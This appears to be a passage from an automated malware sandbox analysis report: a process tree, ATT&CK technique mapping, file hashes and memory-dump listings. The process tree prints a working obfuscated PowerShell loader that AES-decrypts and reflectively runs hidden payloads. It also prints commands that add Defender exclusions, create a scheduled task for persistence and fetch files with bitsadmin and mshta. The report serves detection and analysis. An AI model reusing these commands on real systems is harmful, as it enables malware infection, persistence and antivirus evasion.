        Suspicious use of WriteProcessMemory
        
        PID:652
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNg4KoCSielf7qjlYXqAO7JKxI943sat8z2fd+W+bvE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pCU0X49GzoVy33W1yhXDAg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bRFqs=New-Object System.IO.MemoryStream(,$param_var); $HEgAc=New-Object System.IO.MemoryStream; $MSyPu=New-Object System.IO.Compression.GZipStream($bRFqs, [IO.Compression.CompressionMode]::Decompress); $MSyPu.CopyTo($HEgAc); $MSyPu.Dispose(); $bRFqs.Dispose(); $HEgAc.Dispose(); $HEgAc.ToArray();}function execute_function($param_var,$param2_var){ $DDEgm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fglmO=$DDEgm.EntryPoint; $fglmO.Invoke($null, $param2_var);}$fVuCm = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.bat';$host.UI.RawUI.WindowTitle = $fVuCm;$EZbPl=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($fVuCm).Split([Environment]::NewLine);foreach ($MKKIe in $EZbPl) { if ($MKKIe.StartsWith('ZLMHHVVTjNWeBRfMcCXh')) { $saOcJ=$MKKIe.Substring(20); break; }}$payloads_var=[string[]]$saOcJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:2224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1548
        
        C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"
        7⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1028
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
        8⤵
        Creates scheduled task(s)
        
        PID:232
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        7⤵
        
        PID:1056
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe
        8⤵
        Download via BitsAdmin
        
        PID:500
        
        C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4264

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
338B

MD5
58c16aef4a0ab99e4b21c755de99f3d1

SHA1
033f9aa1f6738163c8ad2698e6461c29bb1892e1

SHA256
20948b155843e982cc1d8f1d287b06f763f14ce27f368acef42c27a9e24f6726

SHA512
139acd86950a128920b5d94260ec7c95701407aaf3a5e11ba6a6dcceaf40d51bc44a7a84aa6f71ba6750de3d38f1bdd5bac0180a7872b1ce3886d59dcf401b5c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
328B

MD5
2706338be57957c36e522aea195dfb67

SHA1
5edb5ce823cee667af3f22504011a43586ed7e47

SHA256
dc0bcdee529306672127ab14f0221e47c036401da351396f39aaa9adb1c0ba45

SHA512
4b3ca6a9d8632e176560dfbe77a3b6988a1af4783d5df8773438f133136a486d49a90bf496c79abd4f60460edaa37236736ec464dcbc408883d6113eefd34dc3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A37B8BA80004D3266CB4D93B2052DC10_A93CE4618EE38C3485BA7B27239D573A

Filesize
524B

MD5
c964f98c7b2c2658f0598b7a4aae075b

SHA1
3150fab0d158dc83dbaced24786cd81ad2a0b5f9

SHA256
abee47e1e1721345a0c5e33e53370f1614c404a6b71506cad4d31579d0efb0db

SHA512
a53231618c8f8bd23d0401ae5f08883de6da6411e4ccc1fabc43dd755eb4fd7ef9044b2c861a635424eb672a0bbec47f932e6019bdee1b7b2f1c63720955244e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E943B0FFA8084B6B254AAF787773AA42_D4E29B2355F9CFB2431676E87E1A6DFC

Filesize
540B

MD5
892dd0e625446f2923a7159c9de8850f

SHA1
e2aa449b8ae290a7c7c64579a225bf701cce39f6

SHA256
79529b6a5d751f8687a06d5ccc072f395f5bb1675814a47f1aea005ab5fae1ed

SHA512
975c35fde4b04599317a08f2ec9af18ffa2bc75d28101128816d1d114e272b3bcb88a2784c923b9f9cc1d44d0fbcc777d2859c6afc48b709ff3c60151f0025df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
3ec0d76d886b2f4b9f1e3da7ce9e2cd7

SHA1
68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea

SHA256
214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5

SHA512
a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f65feb0fbbd0fcb9da91d117a38e4f31

SHA1
95b1256dd050df6d555a4d06d4dc7ac542b6a070

SHA256
cb0bff45abfcccadc000e77840ccf5004ae4197a8d98baab877e6e9c238bba0c

SHA512
0715ba19e75a60eeb6cf98f4bc80980f1f1e681bd69d3ce242bf1c50787b82eb99064de0c0753c4259dcc8837a65ac2b7c84b3c1f114200cb252c05e448b1776

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f8c40f7624e23fa92ae2f41e34cfca77

SHA1
20e742cfe2759ac2adbc16db736a9e143ca7b677

SHA256
c51a52818a084addbfa913d2bb4bb2b0e60c287a4cf98e679f18b8a521c0aa7b

SHA512
f1da3ec61403d788d417d097a7ed2947203c6bff3cf1d35d697c31edecdf04710b3e44b2aa263b886e297b2ce923fea410ccc673261928f1d0cd81252740dbe7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4ae54c3a00d1d664f74bfd4f70c85332

SHA1
67f3ed7aaea35153326c1f907c0334feef08484c

SHA256
1e56a98f74d4a604bef716b47ef730d88f93aec57a98c89aa4423394cbc95b5c

SHA512
b3bbdefeaadbdaac00f23ce3389bbd3b565bd7e0079aeebf3e4afba892382e1cd3896c00bb2e5a98146ac593f9bdc5568d0bd08c5b0139f0814b1a38911c3889

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l4t1wwrk.52b.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.bat

Filesize
511KB

MD5
537886f4e49111f326e5d90e4c38c7d1

SHA1
57b09c800cba244e68d317a0960f041aee468360

SHA256
dc4ad7f04bd7f277494092d4db0c337b1b4bbe5d0bc8a667babf5f3045144416

SHA512
0deb228bf17e218fdf7f98f49f89c1f25ee059c95887a697afbe64acbf3411f022eb80ee5349e8e44658511609e0c585aa501cb645439bc97088ba169f7c8107

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.vbs

Filesize
124B

MD5
9060b4ba1e8991f1d0aa5cd0eb4c2356

SHA1
c96bed4a46a6afcd90a2488a4462c2543264a4ee

SHA256
6e41be19c1bd85535fa7b9e7bff0bfd06018b52dceb93e301618171c07c46fd3

SHA512
b45f369c9d2c4286ccc48b37d17d7ad7624402bb706ccf53a02da7540b2dca869fbeff5b8cb8a9389bc26280753ba21494ea53ee124600792d019df184068716

Download Submit
C:\Users\Admin\AppData\Roaming\Downloader.hta

Filesize
903B

MD5
4ec749a8c1d7d0a4be501465d297d3dc

SHA1
d7727cb4dc96d653bce6c6bbe70ff171ecc197b7

SHA256
7bd2ea1be121e862cc93c8c41429d0f9d1d3b57478e586bbeed7d3d3be3a96f6

SHA512
38d4ca973a3da55453dd37cb8965db223d42b03493b8d5390ab58cc3b53df1405119663f91bcef2ce2efc082ea17b0021c407eb65c6076d127408f2ff2c7d44e

Download Submit
C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

Filesize
104KB

MD5
2da779eff5b744fb55630f1fea103c69

SHA1
27451e6cf9c69908e8ee6a4b373a31a14a83807e

SHA256
6892baef0e4f6221b3cf66d16effaa88c79e985e41daf9f125b83489bb49c4bd

SHA512
63b6e232d03455bc6c9aff13dcf4eaf0c7e2b423bb3e00c32a06a23f623f80ffbfb43e08827494948825ece10fd59e52ac91ded6e206197f97431a36eb9f22d5

Download Submit
memory/832-105-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/876-30-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/876-25-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/876-27-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/876-26-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/1044-13-0x000001F1A7930000-0x000001F1A7976000-memory.dmp

Filesize
280KB

Download
memory/1044-12-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/1044-0-0x00007FFA49283000-0x00007FFA49285000-memory.dmp

Filesize
8KB

Download
memory/1044-14-0x000001F1A74F0000-0x000001F1A74F8000-memory.dmp

Filesize
32KB

Download
memory/1044-15-0x000001F1A7980000-0x000001F1A79E2000-memory.dmp

Filesize
392KB

Download
memory/1044-11-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/1044-10-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/1044-9-0x000001F1A7500000-0x000001F1A7522000-memory.dmp

Filesize
136KB

Download
memory/1044-47-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

Filesize
10.8MB

Download
memory/1120-107-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/1236-111-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/1300-98-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/1320-97-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/1440-104-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/1488-108-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/1548-142-0x0000021CBA390000-0x0000021CBA3CC000-memory.dmp

Filesize
240KB

Download
memory/1676-96-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/1760-102-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/1864-207-0x0000025451240000-0x0000025451256000-memory.dmp

Filesize
88KB

Download
memory/2064-109-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/2236-99-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/2280-100-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/2552-106-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/2612-101-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/2656-110-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/3276-95-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/3276-48-0x0000000002FD0000-0x0000000002FFA000-memory.dmp

Filesize
168KB

Download
memory/3456-103-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

Filesize
64KB

Download
memory/4764-155-0x0000000000130000-0x0000000000150000-memory.dmp

Filesize
128KB

Download